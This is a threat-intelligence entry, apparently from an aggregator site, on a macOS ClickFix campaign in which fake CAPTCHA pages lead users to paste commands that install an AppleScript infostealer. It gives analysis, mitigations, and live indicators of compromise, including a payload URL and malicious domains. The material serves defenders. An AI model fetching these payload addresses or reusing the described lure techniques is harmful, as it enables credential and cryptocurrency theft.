macOS ClickFix Campaign: AppleScript Stealers & New Terminal Protections
The macOS ClickFix campaign uses fake CAPTCHA pages to trick users into executing malicious commands. The macOS variant deploys an AppleScript-based infostealer that collects sensitive data such as keychain databases, credentials, session cookies from multiple browsers, browser extensions, and cryptocurrency wallets. It uses a persistent dialog box mimicking system prompts to coerce users into providing their system password. Stolen session cookies allow attackers to bypass multi-factor authentication by hijacking active sessions. The campaign filters victims by user-agent to deliver OS-specific payloads. Recent macOS updates include native terminal security warnings to alert users against pasting potentially malicious commands.
AI Analysis
Technical Summary
This campaign targets Windows and macOS users via social engineering through fake CAPTCHA pages that lead victims to execute malicious commands. On macOS, the malware uses AppleScript to steal extensive sensitive information, including keychain data, credentials, session cookies from 12 browsers, over 200 browser extensions, and 16 cryptocurrency wallets. It enforces persistence and user interaction by displaying a non-closable dialog box that mimics legitimate system prompts to obtain the victim's system password. The stolen session cookies facilitate session hijacking, enabling attackers to bypass multi-factor authentication protections. The campaign uses client-side JavaScript to identify desktop users and deliver OS-specific payloads, ignoring mobile devices. Apple has introduced native terminal security warnings in recent macOS versions to help users recognize and avoid pasting malicious commands.
Potential Impact
The campaign enables attackers to harvest highly sensitive data including credentials, keychain contents, browser session cookies, and cryptocurrency wallet information. This can lead to unauthorized access to user accounts, bypassing multi-factor authentication through session hijacking, and theft of cryptocurrency assets. The persistent dialog box coercion increases the likelihood of privilege escalation by obtaining system passwords. The campaign's social engineering approach increases the risk of successful infection among targeted users. However, there are no known exploits in the wild reported at this time.
Mitigation Recommendations
There is no specific patch available for this campaign as it relies on social engineering and user interaction. However, recent macOS updates include native terminal security warnings that alert users when pasting potentially malicious commands, which helps mitigate risk. Users should be cautious about executing commands from untrusted sources and avoid interacting with suspicious CAPTCHA pages or dialogs. Security awareness training to recognize social engineering tactics is recommended. Monitor for indicators of compromise such as the listed domains, IP addresses, and hashes. Since this is not a software vulnerability, remediation focuses on user education and leveraging built-in macOS protections.
Indicators of Compromise
- domain: gen.detect.by.nscloudsandbox.tr
- ip: 172.94.9.250
- ip: 172.94.9.250
- domain: bull-run.fun
- domain: spot-wave.fun
- hash: e12285f507c847b986233991b86b22e3
- url: https://bull-run.fun/
- url: https://spot-wave.fun/
- hash: 77b1beb083e4e2074402742ef2d677835072acf0e7ddd9ee8206e5a2c76b1ca5
- hash: c07a15640065580e3bbff86eb567050e1a9e9847e2034ff00953ce7eeb2eec41
- url: http://172.94.9.250/d/xxx10108
macOS ClickFix Campaign: AppleScript Stealers & New Terminal Protections
Description
The macOS ClickFix campaign uses fake CAPTCHA pages to trick users into executing malicious commands. The macOS variant deploys an AppleScript-based infostealer that collects sensitive data such as keychain databases, credentials, session cookies from multiple browsers, browser extensions, and cryptocurrency wallets. It uses a persistent dialog box mimicking system prompts to coerce users into providing their system password. Stolen session cookies allow attackers to bypass multi-factor authentication by hijacking active sessions. The campaign filters victims by user-agent to deliver OS-specific payloads. Recent macOS updates include native terminal security warnings to alert users against pasting potentially malicious commands.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This campaign targets Windows and macOS users via social engineering through fake CAPTCHA pages that lead victims to execute malicious commands. On macOS, the malware uses AppleScript to steal extensive sensitive information, including keychain data, credentials, session cookies from 12 browsers, over 200 browser extensions, and 16 cryptocurrency wallets. It enforces persistence and user interaction by displaying a non-closable dialog box that mimics legitimate system prompts to obtain the victim's system password. The stolen session cookies facilitate session hijacking, enabling attackers to bypass multi-factor authentication protections. The campaign uses client-side JavaScript to identify desktop users and deliver OS-specific payloads, ignoring mobile devices. Apple has introduced native terminal security warnings in recent macOS versions to help users recognize and avoid pasting malicious commands.
Potential Impact
The campaign enables attackers to harvest highly sensitive data including credentials, keychain contents, browser session cookies, and cryptocurrency wallet information. This can lead to unauthorized access to user accounts, bypassing multi-factor authentication through session hijacking, and theft of cryptocurrency assets. The persistent dialog box coercion increases the likelihood of privilege escalation by obtaining system passwords. The campaign's social engineering approach increases the risk of successful infection among targeted users. However, there are no known exploits in the wild reported at this time.
Mitigation Recommendations
There is no specific patch available for this campaign as it relies on social engineering and user interaction. However, recent macOS updates include native terminal security warnings that alert users when pasting potentially malicious commands, which helps mitigate risk. Users should be cautious about executing commands from untrusted sources and avoid interacting with suspicious CAPTCHA pages or dialogs. Security awareness training to recognize social engineering tactics is recommended. Monitor for indicators of compromise such as the listed domains, IP addresses, and hashes. Since this is not a software vulnerability, remediation focuses on user education and leveraging built-in macOS protections.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://www.netskope.com/blog/macos-clickfix-campaign-applescript-stealers-new-terminal-protections"]
- Adversary
- null
- Pulse Id
- 69e6db546f646b9818b7bf0d
- Threat Score
- null
Indicators of Compromise
Domain
| Value | Description | Copy |
|---|---|---|
domaingen.detect.by.nscloudsandbox.tr | — | |
domainbull-run.fun | — | |
domainspot-wave.fun | — |
Ip
| Value | Description | Copy |
|---|---|---|
ip172.94.9.250 | — | |
ip172.94.9.250 | CC=DE ASN=AS3223 voxility llp |
Hash
| Value | Description | Copy |
|---|---|---|
hashe12285f507c847b986233991b86b22e3 | — | |
hash77b1beb083e4e2074402742ef2d677835072acf0e7ddd9ee8206e5a2c76b1ca5 | — | |
hashc07a15640065580e3bbff86eb567050e1a9e9847e2034ff00953ce7eeb2eec41 | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttps://bull-run.fun/ | — | |
urlhttps://spot-wave.fun/ | — | |
urlhttp://172.94.9.250/d/xxx10108 | — |
Threat ID: 69e743d919fe3cd2cdbf5f8c
Added to database: 4/21/2026, 9:31:05 AM
Last enriched: 4/21/2026, 9:46:25 AM
Last updated: 4/21/2026, 12:58:37 PM
Views: 9
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.